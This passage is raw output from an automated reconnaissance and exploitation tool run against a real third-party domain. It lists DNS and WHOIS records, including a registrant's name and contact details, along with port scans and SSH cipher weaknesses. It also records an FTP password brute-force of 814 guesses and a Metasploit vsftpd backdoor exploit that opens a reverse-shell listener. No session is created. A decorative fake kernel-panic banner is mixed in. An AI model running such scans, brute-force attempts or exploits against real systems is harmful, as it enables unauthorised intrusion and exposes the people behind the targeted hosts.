  1590. [*]      A tinymodel-sugar.com.cc 54.252.107.64
  1591. [*]      A tinymodel-sugar.net.cc 54.252.89.206
  1592. [*]      A tinymodel-sugar.co.cc 175.126.123.219
  1593. [*]      A tinymodel-sugar.org.ch 72.52.4.122
  1594. [*]      A tinymodel-sugar.biz.cl 185.53.178.8
  1595. [*]      A tinymodel-sugar.co.cm 85.25.140.105
  1596. [*]      CNAME tinymodel-sugar.biz.cm i.cns.cm
  1597. [*]      A i.cns.cm 118.184.56.30
  1598. [*]      A tinymodel-sugar.com.com 52.33.196.199
  1599. [*]      A tinymodel-sugar.net.com 199.59.242.150
  1600. [*]      A tinymodel-sugar.com 94.102.49.50
  1601. [*]      A tinymodel-sugar.com 94.102.49.48
  1602. [*]      A tinymodel-sugar.org.com 23.23.86.44
  1603. [*]      A tinymodel-sugar.co.com 173.192.115.17
  1604. [*]      A tinymodel-sugar.biz.cr 72.52.4.122
  1605. [*]      A tinymodel-sugar.net.cm 85.25.140.105
  1606. [*]      A tinymodel-sugar.biz.cx 72.52.4.122
  1607. [*]      A tinymodel-sugar.net.cz 80.250.24.177
  1608. [*]      A tinymodel-sugar.biz.cz 185.53.179.7
  1609. [*]      A tinymodel-sugar.com.cz 62.109.128.30
  1610. [*]      CNAME tinymodel-sugar.co.de co.de
  1611. [*]      A co.de 144.76.162.245
  1612. [*]      A tinymodel-sugar.com.de 50.56.68.37
  1613. [*]      CNAME tinymodel-sugar.org.de www.org.de
  1614. [*]      A www.org.de 78.47.128.8
  1615. [*]      A tinymodel-sugar.net.eu 78.46.90.98
  1616. [*]      A tinymodel-sugar.org.eu 78.46.90.98
  1617. [*]      A tinymodel-sugar.biz.fi 185.55.85.123
  1618. [*]      A tinymodel-sugar.fm 173.230.131.38
  1619. [*]      A tinymodel-sugar.biz.fm 173.230.131.38
  1620. [*]      A tinymodel-sugar.org.fr 149.202.133.35
  1621. [*]      A tinymodel-sugar.biz.gl 72.52.4.122
  1622. [*]      CNAME tinymodel-sugar.co.gp co.gp
  1623. [*]      A co.gp 144.76.162.245
  1624. [*]      A tinymodel-sugar.co.hn 208.100.40.203
  1625. [*]      CNAME tinymodel-sugar.net.hr net.hr
  1626. [*]      A net.hr 192.0.78.25
  1627. [*]      A net.hr 192.0.78.24
  1628. [*]      A tinymodel-sugar.co.ht 72.52.4.122
  1629. [*]      CNAME tinymodel-sugar.biz.hn parkmydomain.vhostgo.com
  1630. [*]      CNAME parkmydomain.vhostgo.com westuser.dopa.com
  1631. [*]      A westuser.dopa.com 107.186.245.119
  1632. [*]      A tinymodel-sugar.info 94.102.49.50
  1633. [*]      A tinymodel-sugar.info 94.102.49.48
  1634. [*]      A tinymodel-sugar.co.jobs 50.17.193.222
  1635. [*]      A tinymodel-sugar.com.jobs 50.19.241.165
  1636. [*]      A tinymodel-sugar.net.jobs 50.19.241.165
  1637. [*]      A tinymodel-sugar.biz.jobs 50.19.241.165
  1638. [*]      A tinymodel-sugar.org.jobs 50.19.241.165
  1639. [*]      A tinymodel-sugar.la 173.230.141.80
  1640. [*]      CNAME tinymodel-sugar.biz.li 712936.parkingcrew.net
  1641. [*]      A 712936.parkingcrew.net 185.53.179.29
  1642. [*]      A tinymodel-sugar.biz.lu 195.26.5.2
  1643. [*]      A tinymodel-sugar.biz.ly 64.136.20.39
  1644. [*]      A tinymodel-sugar.biz.md 72.52.4.122
  1645. [*]      A tinymodel-sugar.co.mk 87.76.31.211
  1646. [*]      A tinymodel-sugar.co.mobi 54.225.105.179
  1647. [*]      A tinymodel-sugar.biz.my 202.190.174.44
  1648. [*]      A tinymodel-sugar.net.net 52.50.81.210
  1649. [*]      A tinymodel-sugar.co.net 188.166.216.219
  1650. [*]      A tinymodel-sugar.org.net 23.23.86.44
  1651. [*]      A tinymodel-sugar.co.nl 37.97.184.204
  1652. [*]      A tinymodel-sugar.com.nl 83.98.157.102
  1653. [*]      A tinymodel-sugar.net.nl 83.98.157.102
  1654. [*]      A tinymodel-sugar.co.nr 208.100.40.202
  1655. [*]      CNAME tinymodel-sugar.co.nu co.nu
  1656. [*]      A co.nu 144.76.162.245
  1657. [*]      CNAME tinymodel-sugar.com.nu com.nu
  1658. [*]      A com.nu 144.76.162.245
  1659. [*]      A tinymodel-sugar.net.nu 199.102.76.78
  1660. [*]      A tinymodel-sugar.org.nu 80.92.84.139
  1661. [*]      A tinymodel-sugar.com.org 23.23.86.44
  1662. [*]      CNAME tinymodel-sugar.net.org pewtrusts.org
  1663. [*]      A pewtrusts.org 204.74.99.100
  1664. [*]      A tinymodel-sugar.ph 45.79.222.138
  1665. [*]      A tinymodel-sugar.co.ph 45.79.222.138
  1666. [*]      A tinymodel-sugar.com.ph 45.79.222.138
  1667. [*]      A tinymodel-sugar.net.ph 45.79.222.138
  1668. [*]      A tinymodel-sugar.org.ph 45.79.222.138
  1669. [*]      A tinymodel-sugar.co.pl 212.91.6.55
  1670. [*]      A tinymodel-sugar.org.pm 208.73.211.165
  1671. [*]      A tinymodel-sugar.org.pm 208.73.210.202
  1672. [*]      A tinymodel-sugar.org.pm 208.73.210.217
  1673. [*]      A tinymodel-sugar.org.pm 208.73.211.177
  1674. [*]      A tinymodel-sugar.co.ps 66.96.132.56
  1675. [*]      CNAME tinymodel-sugar.biz.ps biz.ps
  1676. [*]      A biz.ps 144.76.162.245
  1677. [*]      A tinymodel-sugar.co.pt 194.107.127.52
  1678. [*]      A tinymodel-sugar.pw 141.8.226.58
  1679. [*]      A tinymodel-sugar.co.pw 141.8.226.59
  1680. [*]      A tinymodel-sugar.net.pw 141.8.226.59
  1681. [*]      A tinymodel-sugar.biz.pw 141.8.226.59
  1682. [*]      A tinymodel-sugar.org.pw 141.8.226.59
  1683. [*]      A tinymodel-sugar.net.ro 69.64.52.127
  1684. [*]      CNAME tinymodel-sugar.co.ro now.co.ro
  1685. [*]      A now.co.ro 185.27.255.9
  1686. [*]      A tinymodel-sugar.org.re 217.70.184.38
  1687. [*]      A tinymodel-sugar.com.ru 178.210.89.119
  1688. [*]      A tinymodel-sugar.biz.se 185.53.179.6
  1689. [*]      CNAME tinymodel-sugar.net.se 773147.parkingcrew.net
  1690. [*]      A 773147.parkingcrew.net 185.53.179.29
  1691. [*]      A tinymodel-sugar.co.sl 91.195.240.135
  1692. [*]      A tinymodel-sugar.com.sr 143.95.106.249
  1693. [*]      A tinymodel-sugar.co.su 72.52.4.122
  1694. [*]      A tinymodel-sugar.biz.st 91.121.28.115
  1695. [*]      A tinymodel-sugar.biz.tc 64.136.20.39
  1696. [*]      A tinymodel-sugar.biz.tf 85.236.153.18
  1697. [*]      A tinymodel-sugar.net.tf 188.40.70.29
  1698. [*]      A tinymodel-sugar.net.tf 188.40.70.27
  1699. [*]      A tinymodel-sugar.net.tf 188.40.117.12
  1700. [*]      A tinymodel-sugar.co.tl 208.100.40.202
  1701. [*]      A tinymodel-sugar.co.to 175.118.124.44
  1702. [*]      A tinymodel-sugar.co.tv 31.186.25.163
  1703. [*]      A tinymodel-sugar.biz.tv 72.52.4.122
  1704. [*]      A tinymodel-sugar.org.tv 72.52.4.122
  1705. [*]      CNAME tinymodel-sugar.biz.uz biz.uz
  1706. [*]      A biz.uz 144.76.162.245
  1707. [*]      A tinymodel-sugar.vg 88.198.29.97
  1708. [*]      A tinymodel-sugar.co.vg 88.198.29.97
  1709. [*]      A tinymodel-sugar.com.vg 88.198.29.97
  1710. [*]      A tinymodel-sugar.net.vg 166.62.28.147
  1711. [*]      A tinymodel-sugar.biz.vg 89.31.143.20
  1712. [*]      A tinymodel-sugar.ws 64.70.19.203
  1713. [*]      A tinymodel-sugar.biz.ws 184.168.221.104
  1714. [*]      A tinymodel-sugar.com.ws 202.4.48.211
  1715. [*]      A tinymodel-sugar.org.ws 202.4.48.211
  1716. [*]      A tinymodel-sugar.net.ws 202.4.48.211
  1717. inetnum:        94.102.49.0 - 94.102.49.255
  1718. netname:        SC-QUASI61
  1719. descr:          QUASI
  1720. country:        SC
  1721. org:            ORG-QNL3-RIPE
  1722. admin-c:        QNL1-RIPE
  1723. tech-c:         QNL1-RIPE
  1724. status:         ASSIGNED PA
  1725. mnt-by:         QUASINETWORKS-MNT
  1726. mnt-lower:      QUASINETWORKS-MNT
  1727. mnt-routes:     QUASINETWORKS-MNT
  1728. created:        2008-09-26T21:47:13Z
  1729. last-modified:  2016-01-23T22:31:22Z
  1730. source:         RIPE
  1731.  
  1732. organisation:   ORG-QNL3-RIPE
  1733. org-name:       Quasi Networks LTD.
  1734. org-type:       OTHER
  1735. address:        Suite 1, Second Floor
  1736. address:        Sound & Vision House, Francis Rachel Street
  1737. address:        Victoria, Mahe, SEYCHELLES
  1738. remarks:        *****************************************************************************
  1739. remarks:        IMPORTANT INFORMATION
  1740. remarks:        *****************************************************************************
  1741. remarks:        We are a high bandwidth network provider offering bandwidth solutions.
  1742. remarks:        Government agencies can sent their requests to gov.request@quasinetworks.com
  1743. remarks:        Please only use abuse@quasinetworks.com for abuse reports.
  1744. remarks:        For all other requests, please see the details on our website.
  1745. remarks:        *****************************************************************************
  1746. abuse-mailbox:  abuse@quasinetworks.com
  1747. abuse-c:        AR34302-RIPE
  1748. mnt-ref:        QUASINETWORKS-MNT
  1749. mnt-by:         QUASINETWORKS-MNT
  1750. created:        2015-11-08T22:25:26Z
  1751. last-modified:  2015-11-27T09:37:50Z
  1752. source:         RIPE # Filtered
  1753.  
  1754. role:           Quasi Networks LTD
  1755. address:        Suite 1, Second Floor
  1756. address:        Sound & Vision House, Francis Rachel Street
  1757. address:        Victoria, Mahe, SEYCHELLES
  1758. remarks:        *****************************************************************************
  1759. remarks:        IMPORTANT INFORMATION
  1760. remarks:        *****************************************************************************
  1761. remarks:        We are a high bandwidth network provider offering bandwidth solutions.
  1762. remarks:        Government agencies can sent their requests to gov.request@quasinetworks.com
  1763. remarks:        Please only use abuse@quasinetworks.com for abuse reports.
  1764. remarks:        For all other requests, please see the details on our website.
  1765. remarks:        *****************************************************************************
  1766. abuse-mailbox:  abuse@quasinetworks.com
  1767. nic-hdl:        QNL1-RIPE
  1768. mnt-by:         QUASINETWORKS-MNT
  1769. created:        2015-11-07T22:43:04Z
  1770. last-modified:  2015-11-07T23:04:49Z
  1771. source:         RIPE # Filtered
  1772.  
  1773. % Information related to '94.102.49.0/24AS29073'
  1774.  
  1775. route:          94.102.49.0/24
  1776. descr:          Quasi Networks LTD (IBC)
  1777. [92m + -- ----------------------------=[Running Nslookup]=------------------------ -- +
  1778. Server:     192.168.1.254
  1779. Address:    192.168.1.254#53
  1780.  
  1781. Non-authoritative answer:
  1782. Name:   tinymodel-sugar.info
  1783. Address: 94.102.49.50
  1784. Name:   tinymodel-sugar.info
  1785. Address: 94.102.49.48
  1786.  
  1787. tinymodel-sugar.info has address 94.102.49.48
  1788. tinymodel-sugar.info has address 94.102.49.50
  1789. tinymodel-sugar.info mail is handled by 0 mail3.magic12.com.
  1790.  + -- ----------------------------=[Checking OS Fingerprint]=----------------- -- +
  1791.  
  1792. Xprobe2 v.0.3 Copyright (c) 2002-2005 fyodor@o0o.nu, ofir@sys-security.com, meder@o0o.nu
  1793.  
  1794. [+] Target is tinymodel-sugar.info
  1795. [+] Loading modules.
  1796. [+] Following modules are loaded:
  1797. [x] [1] ping:icmp_ping  -  ICMP echo discovery module
  1798. [x] [2] ping:tcp_ping  -  TCP-based ping discovery module
  1799. [x] [3] ping:udp_ping  -  UDP-based ping discovery module
  1800. [x] [4] infogather:ttl_calc  -  TCP and UDP based TTL distance calculation
  1801. [x] [5] infogather:portscan  -  TCP and UDP PortScanner
  1802. [x] [6] fingerprint:icmp_echo  -  ICMP Echo request fingerprinting module
  1803. [x] [7] fingerprint:icmp_tstamp  -  ICMP Timestamp request fingerprinting module
  1804. [x] [8] fingerprint:icmp_amask  -  ICMP Address mask request fingerprinting module
  1805. [x] [9] fingerprint:icmp_port_unreach  -  ICMP port unreachable fingerprinting module
  1806. [x] [10] fingerprint:tcp_hshake  -  TCP Handshake fingerprinting module
  1807. [x] [11] fingerprint:tcp_rst  -  TCP RST fingerprinting module
  1808. [x] [12] fingerprint:smb  -  SMB fingerprinting module
  1809. [x] [13] fingerprint:snmp  -  SNMPv2c fingerprinting module
  1810. [+] 13 modules registered
  1811. [+] Initializing scan engine
  1812. [+] Running scan engine
  1813. [-] ping:tcp_ping module: no closed/open TCP ports known on 94.102.49.50. Module test failed
  1814. [-] ping:udp_ping module: no closed/open UDP ports known on 94.102.49.50. Module test failed
  1815. [-] No distance calculation. 94.102.49.50 appears to be dead or no ports known
  1816. [+] Host: 94.102.49.50 is up (Guess probability: 50%)
  1817. [+] Target: 94.102.49.50 is alive. Round-Trip Time: 0.47158 sec
  1818. [+] Selected safe Round-Trip Time value is: 0.94315 sec
  1819. [-] fingerprint:tcp_hshake Module execution aborted (no open TCP ports known)
  1820. [-] fingerprint:smb need either TCP port 139 or 445 to run
  1821. [+] Primary guess:
  1822. [+] Host 94.102.49.50 Running OS:  (Guess probability: 100%)
  1823. [+] Other guesses:
  1824. [+] Host 94.102.49.50 Running OS:  (Guess probability: 100%)
  1825. [+] Host 94.102.49.50 Running OS:  (Guess probability: 100%)
  1826. [+] Host 94.102.49.50 Running OS:  (Guess probability: 100%)
  1827. [+] Host 94.102.49.50 Running OS:  (Guess probability: 100%)
  1828. [+] Host 94.102.49.50 Running OS:  (Guess probability: 100%)
  1829. [+] Host 94.102.49.50 Running OS:  (Guess probability: 100%)
  1830. [+] Host 94.102.49.50 Running OS:  (Guess probability: 100%)
  1831. [+] Host 94.102.49.50 Running OS:  (Guess probability: 100%)
  1832. [+] Host 94.102.49.50 Running OS:  (Guess probability: 100%)
  1833. [+] Cleaning up scan engine
  1834. [+] Modules deinitialized
  1835. [+] Execution completed.
  1836.  + -- ----------------------------=[Gathering Whois Info]=-------------------- -- +
  1837. Domain Name: TINYMODEL-SUGAR.INFO
  1838. Registry Domain ID: D28554615-LRMS
  1839. Registrar WHOIS Server:
  1840. Registrar URL: http://www.onlinenic.com
  1841. Updated Date: 2017-04-16T23:48:40Z
  1842. Creation Date: 2009-05-17T21:31:46Z
  1843. Registry Expiry Date: 2018-05-17T21:31:46Z
  1844. Registrar Registration Expiration Date:
  1845. Registrar: OnlineNIC, Inc.
  1846. Registrar IANA ID: 82
  1847. Registrar Abuse Contact Email:
  1848. Registrar Abuse Contact Phone:
  1849. Reseller:
  1850. Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
  1851. Registry Registrant ID: C158550971-LRMS
  1852. Registrant Name: Laura Yun
  1853. Registrant Organization: Offshore Hosting Ltd
  1854. Registrant Street: Oliaji TradeCenter 1st floor
  1855. Registrant City: Victoria
  1856. Registrant State/Province: Mahe
  1857. Registrant Postal Code: 3326
  1858. Registrant Country: AF
  1859. Registrant Phone: +248.2234234
  1860. Registrant Phone Ext:
  1861. Registrant Fax: +248.2234234
  1862. Registrant Fax Ext:
  1863. Registrant Email: domains@offshore-hosting-service.com
  1864. Registry Admin ID: C158550967-LRMS
  1865. Admin Name: Laura Yun
  1866. Admin Organization: Offshore Hosting Ltd
  1867. Admin Street: Oliaji TradeCenter 1st floor
  1868. Admin City: Victoria
  1869. Admin State/Province: Mahe
  1870. Admin Postal Code: 3326
  1871. Admin Country: AF
  1872. Admin Phone: +248.2234234
  1873. Admin Phone Ext:
  1874. Admin Fax: +248.2234234
  1875. Admin Fax Ext:
  1876. Admin Email: domains@offshore-hosting-service.com
  1877. Registry Tech ID: C158550968-LRMS
  1878. Tech Name: Laura Yun
  1879. Tech Organization: Offshore Hosting Ltd
  1880. Tech Street: Oliaji TradeCenter 1st floor
  1881. Tech City: Victoria
  1882. Tech State/Province: Mahe
  1883. Tech Postal Code: 3326
  1884. Tech Country: AF
  1885. Tech Phone: +248.2234234
  1886. Tech Phone Ext:
  1887. Tech Fax: +248.2234234
  1888. Tech Fax Ext:
  1889. Tech Email: domains@offshore-hosting-service.com
  1890. Registry Billing ID: C158550969-LRMS
  1891. Billing Name: Laura Yun
  1892. Billing Organization: Offshore Hosting Ltd
  1893. Billing Street: Oliaji TradeCenter 1st floor
  1894. Billing City: Victoria
  1895. Billing State/Province: Mahe
  1896. Billing Postal Code: 3326
  1897. Billing Country: AF
  1898. Billing Phone: +248.2234234
  1899. Billing Phone Ext:
  1900. Billing Fax: +248.2234234
  1901. Billing Fax Ext:
  1902. Billing Email: domains@offshore-hosting-service.com
  1903. Name Server: NS1.MAGIC12.COM
  1904. Name Server: NS2.MAGIC12.COM
  1905. Name Server: NS3.MAGIC12.COM
  1906. Name Server: NS4.MAGIC12.COM
  1907. DNSSEC: unsigned
  1908. URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
  1909.  
  1910.  + -- ----------------------------=[Gathering OSINT Info]=-------------------- -- +
  1911. [+] Hosts found in search engines:
  1912. ------------------------------------
  1913. [-] Resolving hostnames IPs...
  1914. 94.102.49.48:Www.tinymodel-sugar.info
  1915. 94.102.49.50:www.tinymodel-sugar.info
  1916.  + -- ----------------------------=[Gathering DNS Info]=---------------------- -- +
  1917.  
  1918. ; <<>> DiG 9.10.3-P4-Debian <<>> -x tinymodel-sugar.info
  1919. ;; global options: +cmd
  1920. ;; Got answer:
  1921. ;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 43199
  1922. ;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
  1923.  
  1924. ;; OPT PSEUDOSECTION:
  1925. ; EDNS: version: 0, flags:; udp: 4096
  1926. ;; QUESTION SECTION:
  1927. ;info.tinymodel-sugar.in-addr.arpa. IN  PTR
  1928.  
  1929. ;; AUTHORITY SECTION:
  1930. in-addr.arpa.       3600    IN  SOA b.in-addr-servers.arpa. nstld.iana.org. 2017043288 1800 900 604800 3600
  1931.  
  1932. ;; Query time: 37 msec
  1933. ;; SERVER: 192.168.1.254#53(192.168.1.254)
  1934. ;; WHEN: Mon Oct 16 19:13:55 EDT 2017
  1935. ;; MSG SIZE  rcvd: 130
  1936.  
  1937. dnsenum VERSION:1.2.4
  1938. 
  1939. -----   tinymodel-sugar.info   -----
  1940. 
  1941.  
  1942. Host's addresses:
  1943. __________________
  1944.  
  1945. tinymodel-sugar.info.                    4        IN    A        94.102.49.48
  1946. tinymodel-sugar.info.                    4        IN    A        94.102.49.50
  1947. 
  1948.  
  1949. Name Servers:
  1950. ______________
  1951.  
  1952. ns3.magic12.com.                         7297     IN    A        89.248.171.99
  1953. ns2.magic12.com.                         259200   IN    A        94.102.49.50
  1954. ns1.magic12.com.                         259200   IN    A        94.102.49.46
  1955. 
  1956.  
  1957. Mail (MX) Servers:
  1958. ___________________
  1959.  
  1960. mail3.magic12.com.                       86400    IN    A        5.79.85.174
  1961. 
  1962.  
  1963. Trying Zone Transfers and getting Bind Versions:
  1964. _________________________________________________
  1965.  
  1966. 
  1967. Trying Zone Transfer for tinymodel-sugar.info on ns3.magic12.com ...
  1968.  
  1969. Trying Zone Transfer for tinymodel-sugar.info on ns2.magic12.com ...
  1970.  
  1971. Trying Zone Transfer for tinymodel-sugar.info on ns1.magic12.com ...
  1972.  
  1973. brute force file not specified, bay.
  1974.  + -- ----------------------------=[Gathering DNS Subdomains]=---------------- -- +
  1975. 
  1976.                  ____        _     _ _     _   _____
  1977.                 / ___| _   _| |__ | (_)___| |_|___ / _ __
  1978.                 \___ \| | | | '_ \| | / __| __| |_ \| '__|
  1979.                  ___) | |_| | |_) | | \__ \ |_ ___) | |
  1980.                 |____/ \__,_|_.__/|_|_|___/\__|____/|_|
  1981.  
  1982.                 # Coded By Ahmed Aboul-Ela - @aboul3la
  1983.    
  1984. [-] Enumerating subdomains now for tinymodel-sugar.info
  1985. [-] verbosity is enabled, will show the subdomains results in realtime
  1986. [-] Searching now in Baidu..
  1987. [-] Searching now in Yahoo..
  1988. [-] Searching now in Google..
  1989. [-] Searching now in Bing..
  1990. [-] Searching now in Ask..
  1991. [-] Searching now in Netcraft..
  1992. [-] Searching now in DNSdumpster..
  1993. [-] Searching now in Virustotal..
  1994. [-] Searching now in ThreatCrowd..
  1995. [-] Searching now in SSL Certificates..
  1996. [-] Searching now in PassiveDNS..
  1997. Yahoo: www.tinymodel-sugar.info
  1998. Virustotal: www.tinymodel-sugar.info
  1999. [-] Saving results to file: /usr/share/sniper/loot/domains/domains-tinymodel-sugar.info.txt
  2000. [-] Total Unique Subdomains Found: 1
  2001. www.tinymodel-sugar.info
  2002.  ╔═╗╦═╗╔╦╗╔═╗╦ ╦
  2003.  ║  ╠╦╝ ║ ╚═╗╠═╣
  2004.  ╚═╝╩╚═ ╩o╚═╝╩ ╩
  2005.  + -- ----------------------------=[Gathering Certificate Subdomains]=-------- -- +
  2006. 
  2007.  [+] Domains saved to: /usr/share/sniper/loot/domains/domains-tinymodel-sugar.info-full.txt
  2008. 
  2009.  + -- ----------------------------=[Checking for Sub-Domain Hijacking]=------- -- +
  2010.  + -- ----------------------------=[Checking Email Security]=----------------- -- +
  2011.  
  2012.  + -- ----------------------------=[Pinging host]=---------------------------- -- +
  2013. PING tinymodel-sugar.info (94.102.49.48) 56(84) bytes of data.
  2014. 64 bytes from 94.102.49.48 (94.102.49.48): icmp_seq=1 ttl=58 time=117 ms
  2015. --- tinymodel-sugar.info ping statistics ---
  2016. 1 packets transmitted, 1 received, 0% packet loss, time 0ms
  2017. rtt min/avg/max/mdev = 117.324/117.324/117.324/0.000 ms
  2018.  
  2019.  + -- ----------------------------=[Running TCP port scan]=------------------- -- +
  2020.  
  2021. Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-16 19:14 EDT
  2022. Nmap scan report for tinymodel-sugar.info (94.102.49.50)
  2023. Host is up (0.17s latency).
  2024. Other addresses for tinymodel-sugar.info (not scanned): 94.102.49.48
  2025. rDNS record for 94.102.49.50: no-reverse-dns-configured.com
  2026. Not shown: 39 closed ports, 5 filtered ports
  2027. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
  2028. PORT     STATE SERVICE
  2029. 21/tcp   open  ftp
  2030. 22/tcp   open  ssh
  2031. 80/tcp   open  http
  2032. 111/tcp  open  rpcbind
  2033. 3128/tcp open  squid-http
  2034.  
  2035. Nmap done: 1 IP address (1 host up) scanned in 3.65 seconds
  2036.  
  2037.  + -- ----------------------------=[Running Intrusive Scans]=----------------- -- +
  2038.  + -- --=[Port 21 opened... running tests...
  2039.  
  2040. Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-16 19:14 EDT
  2041. Nmap scan report for tinymodel-sugar.info (94.102.49.48)
  2042. Host is up (0.12s latency).
  2043. Other addresses for tinymodel-sugar.info (not scanned): 94.102.49.50
  2044.  
  2045. PORT   STATE SERVICE VERSION
  2046. 21/tcp open  ftp     vsftpd 2.3.5
  2047. | ftp-brute:
  2048. |   Accounts: No valid accounts found
  2049. |_  Statistics: Performed 814 guesses in 182 seconds, average tps: 4.2
  2050. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  2051. Aggressive OS guesses: Linux 3.2.0 (95%), Linux 3.2 - 3.8 (94%), Linux 3.8 (94%), WatchGuard Fireware 11.8 (94%), Linux 2.6.18 - 2.6.22 (94%), Linux 3.1 - 3.2 (93%), Linux 3.5 (93%), Linux 2.6.32 - 2.6.39 (92%), Linux 2.6.39 (91%), Linux 3.0 - 3.2 (91%)
  2052. No exact OS matches for host (test conditions non-ideal).
  2053. Network Distance: 7 hops
  2054. Service Info: OS: Unix
  2055.  
  2056. TRACEROUTE (using port 21/tcp)
  2057. HOP RTT       ADDRESS
  2058. 1   109.74 ms 10.13.0.1
  2059. 2   ...
  2060. 3   110.38 ms po101.gra-g2-a75.fr.eu (178.33.103.231)
  2061. 4   ...
  2062. 5   123.18 ms be100-1112.ams-5-a9.nl.eu (213.251.128.67)
  2063. 6   ...
  2064. 7   129.19 ms 94.102.49.48
  2065.  
  2066. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  2067. Nmap done: 1 IP address (1 host up) scanned in 200.45 seconds
  2068. 
  2069. Unable to handle kernel NULL pointer dereference at virtual address 0xd34db33f
  2070. EFLAGS: 00010046
  2071. eax: 00000001 ebx: f77c8c00 ecx: 00000000 edx: f77f0001
  2072. esi: 803bf014 edi: 8023c755 ebp: 80237f84 esp: 80237f60
  2073. ds: 0018   es: 0018  ss: 0018
  2074. Process Swapper (Pid: 0, process nr: 0, stackpage=80377000)
  2075.  
  2076. 
  2077. Stack: 90909090990909090990909090
  2078.        90909090990909090990909090
  2079.        90909090.90909090.90909090
  2080.        90909090.90909090.90909090
  2081.        90909090.90909090.09090900
  2082.        90909090.90909090.09090900
  2083.        ..........................
  2084.        cccccccccccccccccccccccccc
  2085.        cccccccccccccccccccccccccc
  2086.        ccccccccc.................
  2087.        cccccccccccccccccccccccccc
  2088.        cccccccccccccccccccccccccc
  2089.        .................ccccccccc
  2090.        cccccccccccccccccccccccccc
  2091.        cccccccccccccccccccccccccc
  2092.        ..........................
  2093.        ffffffffffffffffffffffffff
  2094.        ffffffff..................
  2095.        ffffffffffffffffffffffffff
  2096.        ffffffff..................
  2097.        ffffffff..................
  2098.        ffffffff..................
  2099. 
  2100.  
  2101. Code: 00 00 00 00 M3 T4 SP L0 1T FR 4M 3W OR K! V3 R5 I0 N4 00 00 00 00
  2102. Aiee, Killing Interrupt handler
  2103. Kernel panic: Attempted to kill the idle task!
  2104. In swapper task - not syncing
  2105. 
  2106.  
  2107.        =[ metasploit v4.16.10-dev                         ]
  2108. + -- --=[ 1687 exploits - 966 auxiliary - 299 post        ]
  2109. + -- --=[ 499 payloads - 40 encoders - 10 nops            ]
  2110. + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
  2111.  
  2112. RHOST => tinymodel-sugar.info
  2113. RHOSTS => tinymodel-sugar.info
  2114. [*] tinymodel-sugar.info:21 - Banner: 220 (vsFTPd 2.0.7)
  2115. [*] tinymodel-sugar.info:21 - USER: 331 Please specify the password.
  2116. [*] Exploit completed, but no session was created.
  2117. [*] Started reverse TCP double handler on 10.13.4.62:4444
  2118. [*] tinymodel-sugar.info:21 - Sending Backdoor Command
  2119. [*] Exploit completed, but no session was created.
  2120.  + -- --=[Port 22 opened... running tests...
  2121. # general
  2122. (gen) banner: SSH-2.0-OpenSSH_6.0p1 Debian-4+deb7u3
  2123. (gen) software: OpenSSH 6.0p1
  2124. (gen) compatibility: OpenSSH 5.9-6.0, Dropbear SSH 2013.62+ (some functionality from 0.52)
  2125. (gen) compression: enabled (zlib@openssh.com)
  2126.  
  2127. # key exchange algorithms
  2128. (kex) ecdh-sha2-nistp256                    -- [fail] using weak elliptic curves
  2129.                                             `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
  2130. (kex) ecdh-sha2-nistp384                    -- [fail] using weak elliptic curves
  2131.                                             `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
  2132. (kex) ecdh-sha2-nistp521                    -- [fail] using weak elliptic curves
  2133.                                             `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
  2134. (kex) diffie-hellman-group-exchange-sha256  -- [warn] using custom size modulus (possibly weak)
  2135.                                             `- [info] available since OpenSSH 4.4
  2136. (kex) diffie-hellman-group-exchange-sha1    -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  2137.                                             `- [warn] using weak hashing algorithm
  2138.                                             `- [info] available since OpenSSH 2.3.0
  2139. (kex) diffie-hellman-group14-sha1           -- [warn] using weak hashing algorithm
  2140.                                             `- [info] available since OpenSSH 3.9, Dropbear SSH 0.53
  2141. (kex) diffie-hellman-group1-sha1            -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  2142.                                             `- [fail] disabled (in client) since OpenSSH 7.0, logjam attack
  2143.                                             `- [warn] using small 1024-bit modulus
  2144.                                             `- [warn] using weak hashing algorithm
  2145.                                             `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
  2146.  
  2147. # host-key algorithms
  2148. (key) ssh-rsa                               -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28
  2149. (key) ssh-dss                               -- [fail] removed (in server) and disabled (in client) since OpenSSH 7.0, weak algorithm
  2150.                                             `- [warn] using small 1024-bit modulus
  2151.                                             `- [warn] using weak random number generator could reveal the key
  2152.                                             `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
  2153. (key) ecdsa-sha2-nistp256                   -- [fail] using weak elliptic curves
  2154.                                             `- [warn] using weak random number generator could reveal the key
  2155.                                             `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
  2156.  
  2157. # encryption algorithms (ciphers)
  2158. (enc) aes128-ctr                            -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
  2159. (enc) aes192-ctr                            -- [info] available since OpenSSH 3.7
  2160. (enc) aes256-ctr                            -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
  2161. (enc) arcfour256                            -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  2162.                                             `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  2163.                                             `- [warn] using weak cipher
  2164.                                             `- [info] available since OpenSSH 4.2
  2165. (enc) arcfour128                            -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  2166.                                             `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  2167.                                             `- [warn] using weak cipher
  2168.                                             `- [info] available since OpenSSH 4.2
  2169. (enc) aes128-cbc                            -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  2170.                                             `- [warn] using weak cipher mode
  2171.                                             `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
